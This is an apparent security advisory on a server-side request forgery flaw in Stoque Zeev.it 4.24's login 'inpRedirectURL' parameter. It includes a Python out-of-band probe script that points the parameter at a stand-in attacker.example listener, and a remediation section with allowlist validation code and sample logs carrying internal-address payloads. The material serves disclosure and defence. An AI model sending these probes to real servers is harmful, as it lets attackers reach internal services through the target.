Stoque Zeev.it Server-Side Request Forgery Vulnerability in Login Page Redirect URL Parameter
Vulnerability
A server-side request forgery (SSRF) vulnerability has been identified in Stoque Zeev.it version 4.24. The issue arises on the login page, at the '/Login?inpLostSession=1' endpoint: the value of the 'inpRedirectURL' parameter is used by the server to issue an HTTP request, so a remote attacker who controls that value can make the application server contact external resources of their choosing. This could be used to reach information or services that are accessible from the server but not directly from the attacker.
Impact
Exploitation of this vulnerability lets an attacker use the application server as a request proxy: the server issues HTTP requests to attacker-chosen destinations, which can disclose information to the attacker or allow interaction with services that are reachable only from the server's network position.
Reproduction
To reproduce this vulnerability, first set up a listener on a host you control to capture incoming HTTP requests. Then send a request to the vulnerable login endpoint with a crafted 'inpRedirectURL' parameter that points to that listener. Once the request is processed, the server-side request appears in the listener's log, indicating successful exploitation. Send the probe with a client that does not follow redirects, and compare the source address of the callback with the target's address: a hit originating from the target host confirms a server-side fetch, whereas a hit from your own client only shows that the browser was redirected (an open redirect, not SSRF). The vulnerability can also be reproduced with Burp Suite by intercepting and modifying the request to test different domains and endpoints.
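The following is an added example of the out-of-band probe described above; it is not code from the advisory or from the vendor. The endpoint path and parameter names are taken from the advisory, while the target host (zeevit.example), the listener address and the probe token are placeholders. The listener records the source address of each hit so that a server-side fetch can be told apart from a client that simply followed a redirect.

```python
"""Out-of-band probe for the inpRedirectURL SSRF (added example, not vendor code).
Assumptions: target host, listener address and token are placeholders."""
import threading
import time
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

LOGIN_PATH = "/Login"  # from the advisory: /Login?inpLostSession=1


def build_probe_url(target_base: str, callback_base: str, token: str) -> str:
    """Login URL with inpLostSession=1 and inpRedirectURL pointing at the
    listener; the token is appended so a hit can be matched to this probe."""
    callback = callback_base.rstrip("/") + "/" + token
    query = urllib.parse.urlencode({"inpLostSession": "1", "inpRedirectURL": callback})
    return target_base.rstrip("/") + LOGIN_PATH + "?" + query


class CallbackListener:
    """Minimal HTTP server that records every request it receives."""

    def __init__(self, host: str = "127.0.0.1", port: int = 0):
        self.hits = []
        listener = self

        class Handler(BaseHTTPRequestHandler):
            def do_GET(self):
                listener.hits.append({
                    "path": self.path,
                    "src": self.client_address[0],          # who fetched us
                    "ua": self.headers.get("User-Agent", ""),
                })
                self.send_response(204)
                self.end_headers()

            def log_message(self, *args):                    # keep stdout quiet
                pass

        self._server = HTTPServer((host, port), Handler)
        self._thread = threading.Thread(target=self._server.serve_forever, daemon=True)

    @property
    def port(self) -> int:
        return self._server.server_address[1]

    def start(self) -> "CallbackListener":
        self._thread.start()
        return self

    def stop(self) -> None:
        self._server.shutdown()
        self._server.server_close()

    def wait_for(self, token: str, timeout: float = 5.0):
        """Poll until a hit whose path contains the token arrives, else None."""
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            for hit in self.hits:
                if token in hit["path"]:
                    return hit
            time.sleep(0.05)
        return None


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Never follow 3xx: if the app only redirects the browser to inpRedirectURL
    (open redirect), following it would make our client hit the listener and
    masquerade as an SSRF."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def send_probe(probe_url: str, timeout: float = 10.0) -> int:
    """GET the probe URL without following redirects; return the HTTP status,
    or -1 if no HTTP response was received."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(probe_url, timeout=timeout) as resp:
            return resp.getcode()
    except urllib.error.HTTPError as err:      # 3xx/4xx/5xx still carry a status
        return err.code
    except urllib.error.URLError:
        return -1


def classify_hit(hit: dict, probe_client_ip: str) -> str:
    """Hit from our own probing address: the client followed a redirect.
    Hit from anywhere else: the server itself fetched the URL (SSRF)."""
    return "client_followed_redirect" if hit["src"] == probe_client_ip else "server_side_fetch"


if __name__ == "__main__":
    listener = CallbackListener(host="0.0.0.0").start()
    # Placeholder public hostname for the listener; replace with your own.
    probe = build_probe_url("https://zeevit.example", f"http://attacker.example:{listener.port}", "a1b2c3")
    print("status:", send_probe(probe))
    hit = listener.wait_for("a1b2c3", timeout=30)
    print(hit and classify_hit(hit, "203.0.113.10") or "no callback received")
    listener.stop()
```

Run the listener on a host reachable by the target; the `__main__` block shows the sequence (build the URL, send without following redirects, wait for the token, classify the hit by source address).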
Remediation
Restrict the 'inpRedirectURL' parameter to an allowlist of trusted destinations: either relative paths on the application itself, or absolute http(s) URLs whose host matches a fixed list exactly, with credentials before an '@', scheme-relative '//host' forms and non-http schemes rejected. Validate the parameter before any server-side use of it; a redirect target only needs to be returned to the client, so the server should not fetch it at all. Monitoring HTTP request logs for 'inpRedirectURL' values that point at hosts outside the allowlist (including internal addresses) helps detect and respond to exploitation attempts.
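An added example of the allowlist check and the log triage described above, written for this page and not taken from the vendor. The allowed hosts, the default landing page and the access-log lines are assumptions constructed for illustration; only the parameter name 'inpRedirectURL' comes from the advisory. The validator rejects the usual allowlist bypasses (scheme-relative and backslash forms, credentials before '@', look-alike hosts, non-http schemes, loopback and link-local targets), and the log scanner reuses it to flag requests whose redirect value would have been rejected.

```python
"""Allowlist validation and log triage for a redirect-URL parameter.
Added example, not vendor code. ALLOWED_HOSTS, DEFAULT_REDIRECT and SAMPLE_LOG
are assumptions/constructed data."""
import re
from urllib.parse import parse_qs, urlsplit, urlunsplit

ALLOWED_HOSTS = {"app.example.com", "portal.example.com"}   # assumption
DEFAULT_REDIRECT = "/"                                        # assumption
PARAM = "inpRedirectURL"                                      # from the advisory


def safe_redirect_target(raw, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_REDIRECT):
    """Return a normalised redirect target if `raw` is a same-site relative path
    or an http(s) URL whose host is on the allowlist; otherwise the default."""
    if not raw:
        return default
    value = raw.strip()
    if any(c in value for c in "\r\n\x00"):      # header-injection characters
        return default
    value = value.replace("\\", "/")             # browsers treat "\" like "/"
    parts = urlsplit(value)
    if not parts.scheme and not parts.netloc:
        # Relative target: a single-slash path only, never "//host"
        if value.startswith("/") and not value.startswith("//"):
            return urlunsplit(("", "", parts.path, parts.query, parts.fragment))
        return default
    if parts.scheme.lower() not in ("http", "https"):
        return default
    if parts.username is not None or parts.password is not None:
        return default                           # http://trusted@evil.example/
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in allowed_hosts:                # exact match, no suffix/prefix tricks
        return default
    try:
        port = parts.port
    except ValueError:                           # malformed port
        return default
    netloc = host if port is None else f"{host}:{port}"
    return urlunsplit((parts.scheme.lower(), netloc, parts.path or "/", parts.query, parts.fragment))


REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_log_lines(lines, allowed_hosts=ALLOWED_HOSTS):
    """Return (client_ip, redirect value) pairs from combined-format access-log
    lines whose inpRedirectURL the validator would reject."""
    flagged = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        query = parse_qs(urlsplit(m.group(1)).query)      # parse_qs percent-decodes
        for raw in query.get(PARAM, []):
            if safe_redirect_target(raw, allowed_hosts) == DEFAULT_REDIRECT and raw.strip() != DEFAULT_REDIRECT:
                flagged.append((client_ip, raw))
    return flagged


# Constructed sample log lines (not real traffic): one legitimate relative
# redirect, one external callback host, one internal service, one unrelated request.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2024:13:55:36 +0000] "GET /Login?inpLostSession=1&inpRedirectURL=%2FHome HTTP/1.1" 302 -',
    '198.51.100.8 - - [10/Oct/2024:13:55:40 +0000] "GET /Login?inpLostSession=1&inpRedirectURL=http%3A%2F%2F203.0.113.9%2Fcb HTTP/1.1" 302 -',
    '198.51.100.9 - - [10/Oct/2024:13:55:44 +0000] "GET /Login?inpLostSession=1&inpRedirectURL=http%3A%2F%2F127.0.0.1%3A8080%2Fadmin HTTP/1.1" 302 -',
    '198.51.100.9 - - [10/Oct/2024:13:55:50 +0000] "GET /Dashboard HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, value in flag_log_lines(SAMPLE_LOG):
        print(f"suspicious {PARAM} from {ip}: {value}")
```

The validator is deliberately strict: anything it cannot positively classify as a same-site path or an allowlisted http(s) host falls back to the default landing page rather than being passed through.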